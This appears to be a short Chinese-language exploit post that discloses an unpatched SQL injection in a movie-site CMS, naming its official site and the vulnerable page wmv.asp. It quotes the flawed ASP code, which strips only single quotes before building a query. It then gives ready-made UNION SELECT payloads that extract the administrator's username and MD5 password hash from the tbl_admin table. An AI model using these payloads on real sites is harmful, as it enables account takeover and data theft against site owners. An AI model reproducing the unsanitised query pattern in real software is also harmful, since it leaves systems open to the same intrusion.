睛天电影系统 Sql Injection Vulnerability 0day
Author: My5t3ry
Official site: http://www.qingtiandy.cn/
vulnerable: /look/template/wmv.asp
Code:
<%
IF Not ChkPost() Then
response.Redirect G_error_page_1
response.End()
End IF
id=replace(request(“url”),”‘”,”") //仅过滤单引号
set rs=conn.execute(“select top 1 url,id from qingtiandy_movieurl_tudou where id=”&id) //带入sql
IF rs.Eof Then
response.Redirect G_error_page_1
response.End()
Else
url=rs(0)
End IF
%>
<object classid=”CLSID:6BF52A52-394A-11d3-B153-00C04F79FAA6″ name=”wmp” width=”508″ height=”415″ align=”middle” id=”wmp”>
<param name=”url” value=”<%=url%>”> //显示url
<param name=”stretchToFit” value=”0″>
<param name=”PlayCount” value=”1″>
<param name=”volume” value=”100″>
<param name=”mute” value=”0″>
<param name=”windowlessVideo” value=”0″>
<param name=”fullScreen” value=”0″>
</object>
<script language=javascript>
function wmpfull()
{
wmp.fullscreen = “1″;
}
document.ondblclick=wmpfull
</script>
Exploit:
javascript:document.write(“<a href=’/look/template/wmv.asp?url=-1 union select str_username,2 from tbl_admin’>科幻片</a> “);
访问打印出来的链接,查看源代码找 到<param name=”url” value=”后面就是管理员用户名
查看管理员MD5为:
javascript:document.write(“<a href=’/look/template/wmv.asp?url=-1 union select str_pass,2 from tbl_admin’>科幻片</a> “);
本文还暂无回复